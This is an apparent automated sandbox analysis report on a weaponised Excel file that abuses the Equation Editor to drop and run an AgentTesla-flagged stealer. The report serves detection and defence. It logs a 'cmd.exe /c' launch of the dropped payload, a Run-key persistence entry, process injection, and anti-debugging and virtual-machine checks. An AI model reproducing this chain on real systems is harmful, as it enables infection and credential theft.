Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_00402B90
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_004073A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_2_002D1040
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00408C60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_0040DC11
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00407C3F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00418CCC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00406CA0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_004028B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_0041A4BE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00418244
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00401650
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00402F20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_004193C4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 11_1_00418788
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00402F89
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00402B90
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_004073A0
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 00406A00 appears 61 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 0040D606 appears 48 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 0040E1D8 appears 88 times
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: String function: 00404374 appears 99 times
                      Source: C:\Users\Public\name.exeCode function: String function: 0040D606 appears 48 times
                      Source: C:\Users\Public\name.exeCode function: String function: 0040E1D8 appears 88 times
                      Source: lxpo[1].exe.2.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: name.exe.2.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: Hqfadrv.exe.6.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: C:\Users\user\AppData\Local\afqH.url, type: DROPPED | Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                      Source: C:\Users\user\AppData\Local\afqH.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                      Source: C:\Users\user\AppData\Local\afqH.url, type: DROPPED | Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                      Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@12/5@11/3
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004286D0 GetLastError,FormatMessageA,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00408FB2 GetDiskFreeSpaceA,
                      Source: C:\Users\Public\name.exe | Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$SpecificationX20202611.xlsx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD75B.tmp
                      Source: C:\Users\Public\name.exe | Command line argument: 08A
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Command line argument: 08A
                      Source: C:\Users\Public\name.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\name.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\name.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                      Source: C:\Users\Public\name.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\Public\name.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: SpecificationX20202611.xlsx | Virustotal: Detection: 62%
                      Source: SpecificationX20202611.xlsx | ReversingLabs: Detection: 53%
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
                      Source: unknown | Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe'
                      Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: C:\Users\Public\name.exe | Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                      Source: C:\Users\Public\name.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: SpecificationX20202611.xlsx | Initial sample: OLE zip file path = xl/embeddings/oleObject1.bin
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: _.pdb source: name.exe, 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2351863459.0000000000450000.00000004.00000001.sdmp
                      Source: SpecificationX20202611.xlsx | Initial sample: OLE indicators vbamacros = False

                      Data Obfuscation:

                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\Public\name.exe | Unpacked PE file: 7.2.name.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Unpacked PE file: 11.2.Hqfadrv.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\Public\name.exe | Unpacked PE file: 7.2.name.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Unpacked PE file: 11.2.Hqfadrv.exe.400000.0.unpack
                      Source: C:\Users\Public\name.exe | Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\Public\name.exe | Code function: 7_2_0041C40C push cs; iretd
                      Source: C:\Users\Public\name.exe | Code function: 7_2_00423149 push eax; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_2_0041C50E push cs; iretd
                      Source: C:\Users\Public\name.exe | Code function: 7_2_004231C8 push eax; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_2_0040E21D push ecx; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_2_0041C6BE push ebx; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_2_003E4F7B push edi; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_2_003E4FBB push es; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_1_0041C40C push cs; iretd
                      Source: C:\Users\Public\name.exe | Code function: 7_1_00423149 push eax; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_1_0041C50E push cs; iretd
                      Source: C:\Users\Public\name.exe | Code function: 7_1_004231C8 push eax; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_1_0040E21D push ecx; ret
                      Source: C:\Users\Public\name.exe | Code function: 7_1_0041C6BE push ebx; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004487E8 push 00448875h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0043E078 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0046C0AC push 0046C0D8h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0040E11C push 0040E298h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00464240 push 004642BDh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0044A25C push 0044A288h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004302DC push 0043031Ah; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0040E29A push 0040E30Bh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0040E29C push 0040E30Bh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0043035C push 00430394h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00430324 push 00430350h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004223E4 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00452434 push 0045249Fh; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00424498 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0042E568 push 0042E638h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00406534 push 00406585h; ret
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004685D0 push 00468652h; ret
                      Source: C:\Users\Public\name.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\name.exe

                      Boot Survival:

                      Drops PE files to the user root directory
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\name.exe
                      Source: C:\Users\Public\name.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hqfa
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045C7F8 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00442998 IsIconic,GetCapture,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0042ED6C IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045CF14 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045CFC4 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0044324C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0045973C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00443B44 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004481B8 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\name.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Process information set: NOOPENFILEERRORBOX
                      Source: SpecificationX20202611.xlsx | Stream path '\x1OlE10NatiVE' entropy: 7.99580138608 (max. 8.0)

                      Malware Analysis System Evasion:

                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0043789C
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\Public\name.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\Public\name.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\Public\name.exe | Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                      Source: C:\Users\Public\name.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\name.exe | Window / User API: threadDelayed 1289
                      Source: C:\Users\Public\name.exe | Window / User API: threadDelayed 8489
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_0043789C
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2836 | Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 2840 | Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep count: 48 > 30
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep time: -44272185776902896s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 2980 | Thread sleep count: 1289 > 30
                      Source: C:\Users\Public\name.exe TID: 3008 | Thread sleep count: 8489 > 30
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep time: -119628s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep time: -59812s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep time: -89673s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep time: -89580s >= -30000s
                      Source: C:\Users\Public\name.exe TID: 3060 | Thread sleep time: -59718s >= -30000s
                      Source: C:\Users\Public\name.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00408DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004059A0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_00428C6C GetSystemInfo,
                      Source: C:\Users\Public\name.exe | Process information queried: ProcessInformation
                      Source: C:\Users\Public\name.exe | Code function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exe | Code function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\Public\name.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040ADB0 GetProcessHeap,HeapFree,
                      Source: C:\Users\Public\name.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeCode function: 7_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeCode function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\Public\name.exeCode function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeCode function: 7_1_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_2_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exeCode function: 11_1_004123F1 SetUnhandledExceptionFilter,
                      Source: C:\Users\Public\name.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\name.exe | Memory written: C:\Users\Public\name.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe
Source: C:\Users\Public\name.exe | Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
Source: name.exe, 00000007.00000002.2352405085.00000000008F0000.00000002.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2352283677.00000000009B0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: name.exe, 00000007.00000002.2352405085.00000000008F0000.00000002.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2352283677.00000000009B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: name.exe, 00000007.00000002.2352405085.00000000008F0000.00000002.00000001.sdmp, Hqfadrv.exe, 0000000B.00000002.2352283677.00000000009B0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\name.exe | Code function: GetLocaleInfoA,
Source: C:\Users\Public\name.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\name.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\Public\name.exe | Code function: 7_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe | Code function: 10_2_004487E8 GetVersion,
Source: C:\Users\Public\name.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000007.00000002.2352654865.0000000001EE2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2353672409.000000000241C000.00000004.00000001.sdmp, type: MEMORY
